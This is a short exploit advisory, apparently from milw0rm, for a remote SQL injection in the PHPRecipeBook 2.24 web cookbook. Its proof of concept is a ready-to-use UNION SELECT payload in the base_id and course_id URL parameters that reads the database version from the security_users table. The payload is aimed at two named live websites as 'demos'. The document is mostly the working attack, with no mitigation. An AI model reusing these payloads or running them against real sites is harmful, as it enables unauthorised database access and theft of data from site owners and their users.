[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability [-] [+] Discovered By d3b4g [+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/ [+] Greetz : str0ke | Inerd | & friends [-] Follow me on twitter www.twitter.com/schaba About: ------> PHPRecipeBook is a Web-based cookbook with the ability to create shopping lists from recipes selected. The lists can be saved and later reloaded and edited. The shopping list also attempts to combine similar items so that duplication does not occur. /* start 0x1 Proof of concept ------------------------------------- Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- /* end ------------------------------------- From Tiny Little island of Maldivies ------------------------------------- # milw0rm.com [2009-03-09]